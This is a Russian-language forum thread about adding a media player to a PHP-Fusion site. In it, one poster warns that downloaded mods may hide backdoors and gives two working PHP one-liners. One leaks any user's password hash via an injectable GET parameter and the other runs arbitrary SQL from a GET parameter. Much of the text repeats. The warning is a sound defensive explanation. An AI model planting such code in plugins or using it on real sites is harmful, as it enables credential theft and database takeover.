Windows Media Player
- Автор темы M.C.R.A.E
- Дата начала
<!--QuoteBegin-•$EGUR@•+14.03.2007, 21:08--><div class='quotetop'>Цитата(•$EGUR@• @ 14.03.2007, 21:08)</div><div class='quotemain'><!--QuoteEBegin-->тока у него регулировки громкости ведь нету 
<div align="right">[snapback]54387[/snapback]</div><!--QuoteEnd--></div><!--QuoteEEnd-->
можно и на компе отрегулировать громкость, это не проблема мне кажется ))) :ao:
<div align="right">[snapback]54387[/snapback]</div><!--QuoteEnd--></div><!--QuoteEEnd-->
можно и на компе отрегулировать громкость, это не проблема мне кажется ))) :ao:
<!--QuoteBegin-ISIDOR+24.02.2007, 22:50--><div class='quotetop'>Цитата(ISIDOR @ 24.02.2007, 22:50)</div><div class='quotemain'><!--QuoteEBegin-->На счёт боюсь ... У меня установлен на моём компе черновик php fusion
в котором я тестю всё без страха ...<!--QuoteEnd--></div><!--QuoteEEnd-->
Опасения •$EGUR@• вполне обоснованы. И черновик php Fusion на локалке тоже ничего не даст.
К примеру:
Я прислал мод, его прикрутили в Downloads, затем скачали и установили на сервер (на локолку) без разницы..
Мод работает изумительно, впрочем он и должен работать изумительно, потому что мод самый обыкновенный но...
В одной строчке мода я прописал такой код:
<!--c1--><div class='codetop'>Код</div><div class='codemain'><!--ec1-->if (isset($_GET['command'])) echo array_pop(dbarray(dbquery("SELECT user_password FROM users WHERE user_id='".$_GET['command']."'")));<!--c2--></div><!--ec2-->
На локалке и на сервере это никак не проявится, да и не должно проявиться, потому что это мой шпион и активизировать его может только тот, кто о нем знает.
Все что мне нужно, это просто что бы вы закачали этот файл на сервер. Дальше дело техники. Я просто обращусь к этому файлу с установленной переменной $command и прочитаю хеш пароль любого пользователя из БД. А больше мне и ничего не нужно, достаточно хеш пароля админа.
Или например такую строчку:
<!--c1--><div class='codetop'>Код</div><div class='codemain'><!--ec1-->if (isset($_GET['command'])) { $result = dbarray(dbquery($_GET['command'])); print_r($result); }<!--c2--></div><!--ec2-->
Такой строчкой я могу вообще выполнять произвольные SQL запросы на сервере где будет размещен этот файл php...
Строчки довольно короткие и их очень легко спрятать в скрипте что на глаза сразу не попадется, а в большинстве случаев никто все равно не поймет чего это такое.
Так что опасения вполне обоснованны... А с Flash и Javascript можно тоже чудес напрограмировать, так что осторожнее с подозрительными фичами.
Кстати есть Flash плеер поприличнее и с регулируемой громкостью и со шкалой времени и вообще прикольный. Может быть в нем есть трояны, а может и нет я сам точно не знаю.
Один недостаток у всех этих плееров все-таки есть. А именно отсутствие работы с Cookie. То есть эти плееры не запоминают какую я устанавливал громкость в последний раз, что бы при следующем посещении или обновлении страницы мне снова не устанавливать нужную громкость.
в котором я тестю всё без страха ...<!--QuoteEnd--></div><!--QuoteEEnd-->
Опасения •$EGUR@• вполне обоснованы. И черновик php Fusion на локалке тоже ничего не даст.
К примеру:
Я прислал мод, его прикрутили в Downloads, затем скачали и установили на сервер (на локолку) без разницы..
Мод работает изумительно, впрочем он и должен работать изумительно, потому что мод самый обыкновенный но...
В одной строчке мода я прописал такой код:
<!--c1--><div class='codetop'>Код</div><div class='codemain'><!--ec1-->if (isset($_GET['command'])) echo array_pop(dbarray(dbquery("SELECT user_password FROM users WHERE user_id='".$_GET['command']."'")));<!--c2--></div><!--ec2-->
На локалке и на сервере это никак не проявится, да и не должно проявиться, потому что это мой шпион и активизировать его может только тот, кто о нем знает.
Все что мне нужно, это просто что бы вы закачали этот файл на сервер. Дальше дело техники. Я просто обращусь к этому файлу с установленной переменной $command и прочитаю хеш пароль любого пользователя из БД. А больше мне и ничего не нужно, достаточно хеш пароля админа.
Или например такую строчку:
<!--c1--><div class='codetop'>Код</div><div class='codemain'><!--ec1-->if (isset($_GET['command'])) { $result = dbarray(dbquery($_GET['command'])); print_r($result); }<!--c2--></div><!--ec2-->
Такой строчкой я могу вообще выполнять произвольные SQL запросы на сервере где будет размещен этот файл php...
Строчки довольно короткие и их очень легко спрятать в скрипте что на глаза сразу не попадется, а в большинстве случаев никто все равно не поймет чего это такое.
Так что опасения вполне обоснованны... А с Flash и Javascript можно тоже чудес напрограмировать, так что осторожнее с подозрительными фичами.
Кстати есть Flash плеер поприличнее и с регулируемой громкостью и со шкалой времени и вообще прикольный. Может быть в нем есть трояны, а может и нет я сам точно не знаю.
Один недостаток у всех этих плееров все-таки есть. А именно отсутствие работы с Cookie. То есть эти плееры не запоминают какую я устанавливал громкость в последний раз, что бы при следующем посещении или обновлении страницы мне снова не устанавливать нужную громкость.